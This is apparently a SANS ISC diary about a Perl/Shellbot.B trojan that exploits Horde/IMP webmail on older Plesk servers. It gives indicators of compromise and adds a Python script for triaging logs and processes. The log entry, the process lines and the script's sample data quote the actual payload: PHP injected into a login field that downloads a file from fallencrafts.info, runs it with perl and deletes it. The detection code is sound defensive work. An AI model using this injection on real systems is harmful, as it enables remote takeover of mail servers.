Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)
ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png. The trojan has limited detection on VirusTotal, the script contains a “hostauth” of sosick[.]net, and the IRC server the compromised systems connect to is located at 126.96.36.199. From what we have so far, it appears to be exploiting an older version of Plesk.
This bot exploits a vulnerability in the Horde/IMP Plesk webmail. You might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info, which appears to be exploiting a Plesk vulnerability (and maybe others), and for connections to 188.8.131.52, for which a lot of activity has been reported to DShield over the past 3 days.
Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 184.108.40.206 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
If a system is compromised, you are likely to see Apache processes similar to these:
apache 10760 0.0 0.0 10816 1084 ? S 11:09 0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache 10761 0.0 0.0 42320 1392 ? S 11:09 0:00 wget http://fallencrafts.info/download/himad.png
md5: bca0b2a88338427ba2e8729e710122cd himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9 himad.png
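The following Python script is an added triage example and is not part of the diary. It turns the three indicators above into checks a responder can run offline: it scans Horde/IMP log lines for failed logins whose username field carries PHP code (as in the log entry above), scans a "ps aux" style process listing for a web-server user running a fetch-and-execute chain out of /var/tmp, and compares a file's digests with the md5/sha-256 listed for himad.png. The malicious sample lines are the ones quoted in the diary; the benign log line, the benign process line, the 203.0.113.5 address and the byte string fed to the hash check are constructed for the example. The log and process-list layouts it parses are the ones shown above; other Horde versions may format the line differently.

```python
"""Triage helpers for the Perl/Shellbot.B indicators in this diary (added example)."""
import hashlib
import re

# Indicators as listed in the diary (defanging brackets removed for matching).
SAMPLE_MD5 = "bca0b2a88338427ba2e8729e710122cd"
SAMPLE_SHA256 = "07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9"
IOC_HOSTS = {"fallencrafts.info", "sosick.net"}

# Horde/IMP "FAILED LOGIN" line; the username ("as ...") field is where the PHP lands.
HORDE_FAILED = re.compile(
    r"HORDE \[error\] \[imp\] FAILED LOGIN (?P<src>\S+) to (?P<dst>\S+) "
    r"as (?P<user>.*?) \[on line (?P<line>\d+) of \"(?P<file>[^\"]+)\"\]"
)
# A PHP open tag or a command-execution function has no business in a username.
PHP_INJECTION = re.compile(r"<\?php|\b(?:passthru|system|exec|shell_exec|popen)\s*\(", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s;\"']*")
# Web-server account fetching something over HTTP, or running an interpreter out of /var/tmp.
DOWNLOAD_CHAIN = re.compile(r"\b(?:wget|curl)\b.*https?://|/var/tmp.*\b(?:perl|sh|python)\b")
WEB_USERS = {"apache", "www-data", "nobody", "psaadm"}

# Sample input: first line is the diary's log entry, second is a constructed benign login.
SAMPLE_HORDE_LINES = [
    'Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 184.108.40.206 to localhost:143[imap/notls] '
    'as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;'
    'perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net '
    '[on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
    'Oct 26 12:01:02 HORDE [error] [imp] FAILED LOGIN 203.0.113.5 to localhost:143[imap/notls] '
    'as alice@example.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
]
# Sample process listing: the diary's two lines plus a constructed benign httpd worker.
SAMPLE_PS_LINES = [
    "apache 10760 0.0 0.0 10816 1084 ? S 11:09 0:00 sh -c cd /var/tmp;cd /var/tmp;"
    "wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*",
    "apache 10761 0.0 0.0 42320 1392 ? S 11:09 0:00 wget http://fallencrafts.info/download/himad.png",
    "apache 10500 0.0 0.1 30000 5000 ? S 11:00 0:00 /usr/sbin/httpd -k start",
]


def scan_horde_log(lines):
    """Return one finding per failed login whose username field contains PHP code."""
    findings = []
    for line in lines:
        m = HORDE_FAILED.search(line)
        if not m or not PHP_INJECTION.search(m.group("user")):
            continue
        hosts = set(URL_RE.findall(m.group("user")))
        findings.append({
            "src": m.group("src"),
            "dst": m.group("dst"),
            "payload": m.group("user"),
            "hosts": sorted(hosts),
            "known_ioc": bool(hosts & IOC_HOSTS),
        })
    return findings


def scan_process_list(ps_lines):
    """Return (user, command) for web-server processes running a download chain."""
    hits = []
    for line in ps_lines:
        fields = line.split(None, 10)  # ps aux: 10 fixed columns, then the full COMMAND
        if len(fields) < 11:
            continue
        user, cmd = fields[0], fields[10]
        if user in WEB_USERS and DOWNLOAD_CHAIN.search(cmd):
            hits.append((user, cmd))
    return hits


def check_sample_digests(data):
    """Hash a suspected himad.png and compare with the md5/sha-256 from the diary."""
    md5 = hashlib.md5(data).hexdigest()
    sha256 = hashlib.sha256(data).hexdigest()
    return {"md5": md5, "sha256": sha256,
            "matches_diary_sample": md5 == SAMPLE_MD5 or sha256 == SAMPLE_SHA256}


if __name__ == "__main__":
    for f in scan_horde_log(SAMPLE_HORDE_LINES):
        print("injected login from %s -> %s (known IoC: %s)" % (f["src"], f["hosts"], f["known_ioc"]))
    for user, cmd in scan_process_list(SAMPLE_PS_LINES):
        print("suspicious process as %s: %s" % (user, cmd))
    print(check_sample_digests(b"constructed placeholder, not the real sample"))
```

Running the script against its embedded samples flags only the diary's log entry (source 184.108.40.206, host fallencrafts.info) and the two apache wget/perl processes, leaving the benign login and the httpd worker alone. On a real box, feed it the Horde log and the output of "ps aux", and hash whatever is sitting in /var/tmp; the hash check only confirms this exact sample, so treat a non-match as inconclusive rather than clean.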
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu